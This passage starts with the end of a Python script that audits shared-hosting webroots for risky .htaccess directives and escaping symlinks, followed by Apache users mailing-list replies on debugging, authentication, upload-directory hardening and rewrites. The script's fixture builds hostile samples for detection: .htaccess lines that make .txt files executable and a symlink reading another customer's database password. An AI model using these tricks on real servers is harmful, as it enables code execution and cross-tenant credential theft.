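    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, errors="replace") as f:
                for finding in scan_htaccess(f.read()):
                    report["htaccess"].append((path,) + finding)
    return report


# Constructed sample .htaccess: lines 2, 3, 6 and 7 should be flagged,
# "Options -Indexes" should not.
SAMPLE_HTACCESS = """\
# constructed sample, not from the thread
Options +FollowSymLinks +ExecCGI
AddHandler cgi-script .txt
AuthType Basic
Options -Indexes
php_value auto_prepend_file /home/alice/public_html/x.txt
RewriteRule ^proxy/(.*)$ http://127.0.0.1/$1 [P,L]
"""


def make_demo_tree():
    """Build a throwaway two-customer tree (constructed fixture); return alice's webroot."""
    base = tempfile.mkdtemp(prefix="htaudit-")
    webroot = os.path.join(base, "alice", "public_html")
    other = os.path.join(base, "bob", "public_html")
    os.makedirs(webroot)
    os.makedirs(other)
    with open(os.path.join(other, "config.php"), "w") as f:
        f.write("<?php $db_password = 'secret';\n")
    with open(os.path.join(webroot, "index.html"), "w") as f:
        f.write("hello\n")
    with open(os.path.join(webroot, ".htaccess"), "w") as f:
        f.write(SAMPLE_HTACCESS)
    os.symlink(os.path.join(webroot, "index.html"), os.path.join(webroot, "home.html"))  # stays inside
    os.symlink(os.path.join(other, "config.php"), os.path.join(webroot, "bob.txt"))      # escapes
    return webroot


if __name__ == "__main__":
    for key, items in audit_webroot(make_demo_tree()).items():
        for item in items:
            print(key, *item)
```

The symlink check is only a detector; the fix on the server side is Options -FollowSymLinks +SymLinksIfOwnerMatch (or suEXEC) and an AllowOverride list that does not include Options or FileInfo, so customers cannot switch those back on from their own .htaccess.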

Re: [us...@httpd] debugging websites running on Apache?

2010-11-19 Thread Scott Gifford
On Fri, Nov 19, 2010 at 7:00 AM, Tomasz Chmielewski  wrote:

> How do you debug websites running on Apache?
>

I have a few tricks I use.

First, I try to write my applications so they can be run from the
commandline.  That means when they misbehave, I can run them directly under
strace or a debugger to see what's going on.

Others have suggested using the Xdebug profiler, but for what you are
looking at, the debugger might be more helpful.  You can just step through
the code one line at a time.

You can try running a Web server on an alternate port that only you use, so
that there will be no noise from other clients.

Sometimes I will have my applications write their PID to the error_log then
sleep for 30 seconds or so.  I can get their PID then and start an strace on
just that process.  You can limit this so they only do it when a request has
a particular parameter, comes from a particular IP address, etc.

Hope some of these techniques are helpful to you,

Scott.


Re: [users@httpd] HTTP authentication using HTTP

2011-01-11 Thread Scott Gifford
On Tue, Jan 11, 2011 at 4:52 AM, Anders Melchiorsen  wrote:

> Hi.
>
> I want to password protect some directories by forwarding the HTTP
> authentication to a different URL. That is, rather than using LDAP or MySQL
> as a backend, I want to use a CGI script (possibly on a different server).
>

You can do this with mod_perl and one of these modules:

http://search.cpan.org/~chansen/Authen-Simple-HTTP-0.2
http://search.cpan.org/~chansen/Authen-Simple-0.4


Both can be used directly in the Apache configuration file and behave like
Apache authentication handlers.

The second module requires a bit more work to set up, but can support
caching, which can be useful depending on your setting.

I have been using a module which is a slightly customized blend of the two
for several years now with great success.

Hope this helps!

Scott.


Re: [users@httpd] giving write permissions to apache user on some folders in document root

2011-02-03 Thread Scott Gifford
On Thu, Feb 3, 2011 at 2:48 PM, James Godrej  wrote:
[ ... ]

> I am not at all convinced by the idea of giving permissions to read,write
> and
> execute as these Learning Management Systems say.
> Let me know what you people have to say?
> What is the best practise in such situations?
>

James,

You are right that making these directories writable by the Web server or
world-writable increases your security risk, since in many cases it allows
escalating the ability to write to the filesystem to the ability to execute
arbitrary code as your Web server user.

One option for mitigating this is to carefully configure the Apache-writable
directories so they will not execute content, by limiting the types of
content allowed there, disabling CGI execution, making sure .htaccess files
are ignored, etc.  Generally the content of these directories will be static
images and so won't need to be executed.

You may find you are able to run the content-management part of the system
using a different Apache instance than the user-viewable part.  That would
let you make these directories writable by the admin Apache instance but not
the public one, then protect that Apache instance with firewall rules, a
strong password, SSL, etc.  This would most likely require a bit of work.

Finally, you can carefully review the security of these applications, their
history of security incidents, etc. to determine if they are reliable enough
to be trusted with this sort of access.  If not, try to find one that is.

Sorry there are no simple answers there, but hopefully it is helpful.

--Scott.
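The first mitigation in that reply (an Apache-writable directory that cannot execute anything), as an added configuration example that is not from the original message; httpd 2.4 syntax, with the upload path, the allowed extensions and the PHP module name as assumptions.

```apache
# Added example, not part of the original reply. httpd 2.4 syntax.
# /var/www/lms/uploads is a hypothetical directory the LMS needs to write to.
<Directory "/var/www/lms/uploads">
    # The application may write here, so nothing written here may change
    # server behaviour: ignore .htaccess, no CGI, no SSI, no listings.
    AllowOverride None
    Options None

    # Serve everything through the core static-file handler rather than a
    # script engine (defense in depth; see the note below on SetHandler).
    SetHandler default-handler
    # mod_php specific; the module name varies with the PHP version
    # (mod_php5.c, mod_php7.c, mod_php.c).
    <IfModule mod_php7.c>
        php_admin_flag engine off
    </IfModule>

    # Deny by default and allow only the content types uploads are supposed
    # to hold, so a stray .php/.phtml/.cgi/.html is never served at all.
    Require all denied
    <FilesMatch "\.(jpe?g|png|gif|webp|pdf)$">
        Require all granted
    </FilesMatch>

    # Stop browsers second-guessing the declared type of what is served.
    <IfModule mod_headers.c>
        Header set X-Content-Type-Options "nosniff"
    </IfModule>
</Directory>
```

Two caveats. A global `<FilesMatch "\.php$"> SetHandler ...` elsewhere in the configuration is merged after this `<Directory>` block and would override the `SetHandler default-handler` line, which is why the extension allowlist, not SetHandler, is the control to rely on. And the directory should be the only part of the site writable by the server user; the application's own code directory must stay read-only to it, otherwise the write-to-execute escalation the reply describes is still available one directory over.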


Re: [users@httpd] Single Value Authentication Module

2011-09-12 Thread Scott Gifford
On Mon, Sep 12, 2011 at 1:01 PM, J.Lance Wilkinson  wrote:
[ ... ]

>
> Actually, I *AM* trying to AUTHENTICATE with it.  I have a directory
> that contains content that is to only be accessed by individuals who
> have paid a specific fee.  I want HTTPD to only offer that directory
> and its content to individuals who have gotten thru the authentication.
>

I have had great luck with clever authentication tricks using mod_perl.
See:

   - http://perl.apache.org/docs/2.0/api/Apache2/Access.html
   - http://search.cpan.org/~mschout/Apache-AuthCookie-3.18/
   - http://search.cpan.org/~chansen/Authen-Simple-0.4/
   - http://search.cpan.org/~kgoldov/Apache2-AuthAny-0.201/

Hope this helps,

-Scott.


Re: [users@httpd] Vanity URL Rewrites Best Practices?

2011-10-03 Thread Scott Gifford
On Mon, Oct 3, 2011 at 2:25 PM, Nick Tkach  wrote:

> Does anyone have any pointers/suggestions on the best way to do vanity url
> rewrites?
>
> For example,
>
> http://foo.com/mmh/maintenance_plan/tip?contentCategoryType=MaintenanceTip&id=%2Fwww%2Favm_webapps%2Fmmh%2Fmaintenance-tips%2Fcontent%2Fafter_blizzard.xml
>
> Being sent to
>
> http://foo.com/mmh/articles/authored/after-blizzard


Drupal uses rules like this:

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !=/favicon.ico
RewriteRule ^(.*)$ index.php?q=$1 [L,QSA]

That is, "if there is no matching file or directory, redirect to an
index.php script and pass the URL in as the parameter q".  That script then
looks up the URL in a database and serves up the right content.

That is a pretty common approach.

Hope this helps,

-Scott.
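The Drupal rules above are written for a .htaccess file. As an added example that goes a little beyond the reply (not from the original message or from Drupal), here is the same front-controller fallback in a vhost, preceded by a fixed set of vanity URLs resolved by mod_rewrite itself via a RewriteMap, which avoids a database lookup for the handful of slugs that never change. The map file, its path and its contents are constructed for illustration; httpd 2.4 syntax.

```apache
# Added example, not part of the original reply. httpd 2.4 syntax,
# server/vhost context (RewriteMap cannot be defined in .htaccess).
RewriteEngine On

# Static vanity URLs. The map file holds one "slug target" pair per line,
# e.g. (constructed):
#   articles/authored/after-blizzard  /mmh/maintenance_plan/tip?contentCategoryType=MaintenanceTip&id=after_blizzard
# Keep the file owned by root and unwritable by the web server user: its
# contents become rewrite targets.
RewriteMap vanity "txt:/etc/apache2/vanity.map"

# Serve the mapped target internally (no redirect) only when the slug is in
# the map; ${...|NONE} supplies a miss value so unknown paths fall through.
RewriteCond %{REQUEST_URI} ^/mmh/(.+)$
RewriteCond ${vanity:%1|NONE} !=NONE
RewriteRule ^/mmh/(.+)$ ${vanity:$1} [L]

# Everything else that is not a real file or directory goes to the front
# controller, exactly as in the Drupal rules above (the leading slash is
# stripped so "q" carries the same value it would from a .htaccess rule).
# The script must treat "q" as untrusted: it is the raw request path, not a
# validated identifier, so look it up, never use it as a filename.
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !=/favicon.ico
RewriteRule ^/(.*)$ /index.php?q=$1 [L,QSA]
```

To check the rules without guessing, set `LogLevel rewrite:trace3` on a test vhost and watch the error log while requesting a mapped slug, an unmapped slug and an existing static file; the first should show the map hit, the other two should reach `/index.php` and the file respectively.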